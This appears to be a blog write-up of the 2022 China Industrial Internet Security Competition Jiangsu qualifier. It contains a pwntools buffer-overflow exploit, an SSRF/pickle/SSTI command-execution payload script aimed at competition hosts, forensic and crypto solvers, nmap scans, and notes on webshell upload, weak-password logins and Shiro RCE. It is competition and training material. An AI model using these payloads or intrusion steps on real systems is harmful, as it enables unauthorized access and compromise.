2022 China Industrial Internet Security Competition, Jiangsu Qualifier

Competition notes: the organization was unbelievably bad. The theory-round environment crashed four times, one Python environment was still being repaired half an hour before the end, and worse, some teams had their submissions scored while the environment's flag was wrong. Simply awesome plus. The pwn challenge came with no attachment, and the RE challenge came with the wrong one. The problem-setting ability here is superb too. And the main thing: every challenge was a damn rehash of existing problems from the internet.

10081 xm

Theory round

Did it like crap.

CTF

pwn1

Below is the write-up from the original xctf challenge I solved earlier.

Check protections

NX is enabled.

Analyze the program in IDA

Entering 1 goes into login(); there is no vulnerable function here.

It reads a username (length 19) and a password (length 199); no buffer overflow there.

It takes the length of the password (s) and, if that length is between 3 and 8, writes the password into dest. s can be up to 0x199 bytes while dest is only 14 bytes, so there is a buffer overflow. To reach it, though, the length stored in v3 must be between 3 and 8, and v3 is an unsigned __int8 (0-256): an input of length 260 wraps the integer so that v3 becomes 4.

Look for the backdoor function

Its address is 0x804868B, so

|padding(14+4)|+|0x804868B|+|padding2(260-14-4-4)| overwrites the return address.

Exp:

```python
from pwn import *

# The target is a 32-bit binary (addresses are 0x804xxxx)
context(arch='i386', os='linux', log_level='debug')

p = remote('222.186.10.114', 18020)

offset = 0x14 + 4            # dest buffer plus saved ebp
system_addr = 0x804868B      # backdoor function found in IDA

offset2 = 0x104 - 0x14 - 4 - 4   # pad to 260 bytes so the uint8 length wraps to 4

payload = b'a' * offset + p32(system_addr) + b'a' * offset2
p.recvuntil(b'choice:')
p.sendline(b'1')
p.recvuntil(b'username:')
p.sendline(b'111')
p.recvuntil(b'passwd:')

p.sendline(payload)

p.interactive()
```

Flag: flag{7KHGUG8XFGK8JZ67}

Protocol analysis 1

Approach: analyze the capture in Wireshark and notice MMS traffic -> spot an anomaly -> combine the characters and base91-decode them to get the final flag.

1. A quick look at the protocols shows MMS carried inside the TCP traffic. MMS makes up a small share of the packets, so apply it as a display filter.

2. Looking at the filtered traffic, two MMS packets look abnormal.

3. Analyzing the data, the highlighted area is abnormal. Extracting the abnormal data as ASCII and combining it, it looks like base91 ciphertext: @iH<,{Mu[8c*{Z&SHjB2F}A

4. Decode it with an online base91 tool, http://www.hiencode.com/base91.html, which finally gives

Flag: flag{3XZGqNB5xlf6}

Communication traffic

The downloaded capture contains GTP traffic.

First filter on the gtp protocol and go through the packets one by one, searching the strings for the SMS data.

Flag: flag{china@iisc}

5 Modbus

There are function code 6 (write) operations, and a PNG is being written.

Analysis shows Modbus write operations. Filter them out with tshark first:

```shell
tshark -r 1667351929574.pcapng -T fields -e modbus.data -Y "modbus.func_code == 6 && ip.src == 192.168.111.138" | sed 's/^00//' | tr -d '\n'
```


Extract the hex and save it as a PNG file with WinHex.
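As an added example (not part of the original write-up), the Python below does the same carve offline for forensic triage: it parses constructed Modbus/TCP "Write Single Register" frames, keeps only function code 6 from the sender 192.168.111.138, takes the low byte of each register value the way the sed command strips the leading 00, and checks the result for the PNG signature. The frame builder, the sample packets and the second host 192.168.111.200 are constructed for the demo.

```python
import struct

PNG_MAGIC = bytes.fromhex("89504e470d0a1a0a")

def build_write_single_register(tid, unit, addr, value):
    """Constructed Modbus/TCP frame: MBAP header + FC6 'Write Single Register' PDU."""
    pdu = struct.pack(">BHH", 6, addr, value)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)   # length counts unit id + PDU
    return mbap + pdu

def parse_frame(frame):
    """Return (function_code, pdu_data) or None if the MBAP header is inconsistent."""
    if len(frame) < 8:
        return None
    _tid, proto, length, _unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        return None
    return frame[7], frame[8:]

def carve_fc6_payload(packets, src_ip):
    """Collect the low byte of every FC6 register value sent by src_ip, in capture order.
    Mirrors the tshark | sed 's/^00//' pipeline: each 16-bit register held 0x00XX."""
    out = bytearray()
    for ip, frame in packets:
        if ip != src_ip:
            continue
        parsed = parse_frame(frame)
        if parsed is None or parsed[0] != 6 or len(parsed[1]) < 4:
            continue
        _addr, value = struct.unpack(">HH", parsed[1][:4])
        out.append(value & 0xFF)
    return bytes(out)

def looks_like_png(blob):
    """Cheap triage check: does the carved stream start with the PNG signature?"""
    return blob.startswith(PNG_MAGIC)

# Constructed sample capture: the sender writes the start of a PNG one byte per register,
# with an unrelated write from a second (made-up) host mixed in.
SAMPLE_BYTES = PNG_MAGIC + bytes.fromhex("0000000d49484452")
SAMPLE_PACKETS = [("192.168.111.138", build_write_single_register(i, 1, 0, b))
                  for i, b in enumerate(SAMPLE_BYTES)]
SAMPLE_PACKETS.insert(3, ("192.168.111.200", build_write_single_register(99, 1, 0x10, 0x1234)))

if __name__ == "__main__":
    carved = carve_fc6_payload(SAMPLE_PACKETS, "192.168.111.138")
    print(carved.hex(), looks_like_png(carved))
```

A stream of single-register writes whose concatenated low bytes form a known file header is a useful detection signal for data smuggled over an ICS protocol.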

Flag: flag{Modbus_Image?}

Re1

An ELF program; analyze it in IDA.

It corresponds to the write syscall.

It prints the data directly.

Exp

```python
# Byte table dumped from the binary (starts with the ELF header bytes)
str1 = [0x7F,0x45,0x4C,0x46,0x01,0x61,0x34,0x66,0x63,0x55,0x32,0x7D,0x79,0x31,0x7B,0x6C,0x02,0x00,0x03,0x00,0x01,0x00,0x00,0x00,0x4C,0x00,0x00,0x08,0x2C,0x00,0x00,0x00,0x67,0x2D,0x37,0x30,0x42,0x36,0xEF,0xBE,0x34,0x00,0x20,0x00,0x01]

# Indices the program uses to pick the bytes it writes out
str2 = [7,0xf,0x5,0x20,0xe,0x3,0x5,0x23,0xd,0x21,0x8,0x23,0xd,0x25,0x25,0x21,0x22,0xa,0x1,0x06,0xb]

flag = ''

for i in range(len(str2)):
    flag += chr(str1[str2[i]])

print(flag)
```

Flag: flag{Fa01-c0166-72E4}

EasyStego

```shell
foremost /root/Documents/jsgk/1667353839667.jpg
```

Carving yields a PDF; the text copied out of it contains odd characters:

```text
7=28L3FC?0E9603@@<DPP`PN
```

The character set points to ROT47; decode it directly to get the flag.

Flag: flag{burn_the_books!!1!}

wzsc

Race-condition upload; brute-forced directly with Burp.

Flag: flag{4NE25HZVDN5RGF66}

funpy

Uploading an image works, but an uploaded PHP file can't be accessed, so it is presumably being deleted; just run a race condition.

Use @/ to bypass get_domain, use SSRF to bypass the local-IP restriction, then use an opcode to bypass the r restriction, and finally overwrite the name value so the SSTI executes the command.

Web2 flag{ZRLCF5H9Z4XSKP4F}

```python
import base64

import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'
}
for i in range(500):
    payload1 = "{{().__class__.__bases__[0].__subclasses__()[" + str(i) + "].__init__.__globals__['popen']('cat flag.txt').read()}}"
    payload3 = '''c__main__
ctf_config
(S'name'
S'{}'
db.'''.format(payload1).strip()
    payload2 = base64.b64encode(payload3.encode())
    url = "http://222.186.10.114:15823/get_baidu?url=http://127.0.0.1:8000/admin?data=" + str(payload2)[2:-1] + "%23@www.baidu.com/"
    res = requests.get(url=url, headers=headers)
    if 'flag' in res.text:  # using FileLoader as an example
        print(i)
        print(url)
        print(res.text)
```

Flag: flag{ZRLCF5H9Z4XSKP4F}

Sign-in: hello

YUc1amFYdHFaMjV1Y1Y5TVZWOWxhbXR3WTJ0bGRYMD0=

Two rounds of base64 decoding give hnci{jgnnq_LU_ejkpckeu}

Decrypt it as a Caesar cipher with an offset of 2.
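An added example, not from the original post: a small Python decoder for the two classical encodings in this write-up, the ROT47 string from EasyStego and the double-base64-plus-Caesar string from this sign-in challenge. SIGNIN and STEGO hold the ciphertexts quoted above; find_flag_shift recovers the Caesar offset by trying all 26 shifts instead of assuming 2.

```python
import base64
import string

def caesar_shift(text, shift):
    """Shift ASCII letters by `shift` (wrapping within a-z / A-Z); other chars unchanged."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)

def find_flag_shift(text, marker="flag{"):
    """Try all 26 Caesar offsets; return (offset, plaintext) for the first containing marker."""
    for offset in range(26):
        candidate = caesar_shift(text, -offset)
        if marker in candidate:
            return offset, candidate
    return None

def rot47(text):
    """ROT47 rotates printable ASCII 33..126 by 47; applying it twice restores the input."""
    return "".join(chr((ord(c) - 33 + 47) % 94 + 33) if 33 <= ord(c) <= 126 else c
                   for c in text)

def decode_signin(blob, layers=2):
    """Peel `layers` of base64, then undo the Caesar shift by searching for 'flag{'."""
    data = blob.encode()
    for _ in range(layers):
        data = base64.b64decode(data, validate=True)
    return find_flag_shift(data.decode())

# Ciphertexts quoted in the write-up
SIGNIN = "YUc1amFYdHFaMjV1Y1Y5TVZWOWxhbXR3WTJ0bGRYMD0="
STEGO = "7=28L3FC?0E9603@@<DPP`PN"

if __name__ == "__main__":
    print(decode_signin(SIGNIN))   # (2, 'flag{hello_JS_chinaics}')
    print(rot47(STEGO))            # flag{burn_the_books!!1!}
```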

Flag: flag{hello_JS_chinaics}

ezhash

Just write a SHA-256 brute-force script.

```python
import hashlib
import itertools

x = '2704efd1382cb3c01cb7962e5b8b06d5dcbe427a61460fb333e126fb646dc108'   # target SHA-256
n = b'86139'                 # known prefix of the number
s = list('0123456789')
for i in itertools.product(s, repeat=8):   # brute-force the remaining 8 digits
    d = ''.join(i).encode()
    g = n + d
    if hashlib.sha256(g).hexdigest() == x:
        print(g)
        break
# b'8617091733716'
```

Flag: flag{8613984594729}

Solve the equation

Throwing the code into Google shows that our great problem-setter used an original CTFtime problem; just take the existing exp and change the variables.

```python
from Crypto.Util.number import *
import gmpy2

n = 8024564127973065791822696697071284794358778113244860389864422981119578975964727093926084927413648922361071020470150564725270618683354904686430544864634986421802250691574811643940493852040303365259871961829230451567976055242366978177493279020860227537560077272183489280971600541432160542487797473494437897108965642412346313867328843027097895335304551681879362719382890575460873246457441445622915378590294513103181807760404215667759122312502771211145132870220086702449210205047154398173087109995899654560082761774761002029827487645976212945576324039049642609852040160573026630219823125371936206527188545760503303196887
c = 3180315760809674805307952038308070668830050176909147638772126511895314499221741418872541998973065111255595861696385202759844093540441475048944982758690063571599282883876643362851380191511250087221840725807404705385725070244402516934527422750911874245857588078974219707033577370635383250007806947507795729667764154840835200953651638272748044402141790503341924861185059671075139783417203879567804845438302056071839026625956697647771368487584705007737854745577029320506832583174617443045018932772363892102614493216452482474734088789707913499300956365998233734355238725491161615031776255737012637741880932940505976334292

# p and q were recovered by solving p + q = 2^1024 - 1 + 31337 together with p * q = n:
# import sympy
# p = sympy.Symbol('p')
# q = sympy.Symbol('q')
# f1 = pow(2,1024) - 1 + 31337 - (p + q)
# f2 = n - p * q
# result = sympy.solve([f1,f2],[p,q])
# print(result)
p = 82489564461427484138429550090132552795702149336804845991457103358176253229127370675969792065057152173809946056104472178496911325543350827134018681875705917009608058362246799798558207922841479865394443230979923827962082687904427293092936393489720798317782318826070444552061801758933280333283379833380472520009
q = 97279749024804106634500968988769920566095548557425811281972977799556422576373592456738685257350383847310167823766921179161878443271065795358828748763768207368159835062618685477744011678404614254058639721105081940876067994438035588380976717051106438845568191858515853687885444179546435971551976496243751648543

phi = (p - 1) * (q - 1)
k = 1
while True:
    # e is unknown but of the form 2^k - 1; try increasing k
    k += 1
    e = 2 ** k - 1
    gcd = gmpy2.gcd(e, phi)
    e2 = e // gcd
    # e2 is invertible mod phi//gcd, so this recovers m^gcd; the gcd-th root gives m
    d = gmpy2.invert(e2, phi // gcd)
    m = pow(c, d, n)
    root, judge = gmpy2.iroot(m, gcd)   # judge is True when the root is exact
    plaintext = long_to_bytes(root)
    # print(plaintext)
    if b'flag' in plaintext and judge:
        print(plaintext)
        break
```

Flag: b'flag{brutE_f0rCe_1s_usefull}'

Scenario challenges

10.52.1.0/24

```shell
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml 10.52.1.0/24
nmap -T4 -v -A -O 10.52.1.2
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt -iL ip.txt
```

```text
Nmap scan report for 10.52.1.14
Host is up (0.021s latency).
Not shown: 998 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server

Nmap scan report for 10.52.1.17
Host is up (0.021s latency).
Not shown: 996 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
```

Scenario 1

The site at 10.52.1.14:80 has the Zhiyuan OA (致远OA) arbitrary file upload vulnerability.

http://10.52.1.14/kkkkk.jsp
passsssss

After getting a shell we found a Windows Server 2016 machine, but with a low-privilege account, so RottenPotato privilege escalation was needed. It didn't succeed at the time; later the competition gave a hint and we simply logged in remotely. There was a flag on the desktop.

Then we set up frp for intranet tunneling; scanning found the following intranet hosts:

10.10.210.213 had port 3389 open; a weak-password scanning tool got straight in with administrator / 123456789

10.10.210.225 had port 23 open; test / 123456 went straight in

In the login directory there is a file named 用户名密码.txt (username and password); reading it, we logged in remotely and the flag was on the desktop.

Scenario 2

The site at 10.52.1.17:8080 has the Zhiyuan OA (致远OA) arbitrary file upload vulnerability.

There is a keyboard-walk weak password and Shiro command execution, but honestly the password is not weak at all.

After logging in, run env and download the heapdump file; analyzing it gives the key.

With the Shiro tool you can execute commands directly and get root.

But we only got this environment to work after the competition had ended.

Author

丨greetdawn丨

Published on

2022-10-15

Updated on

2023-05-06
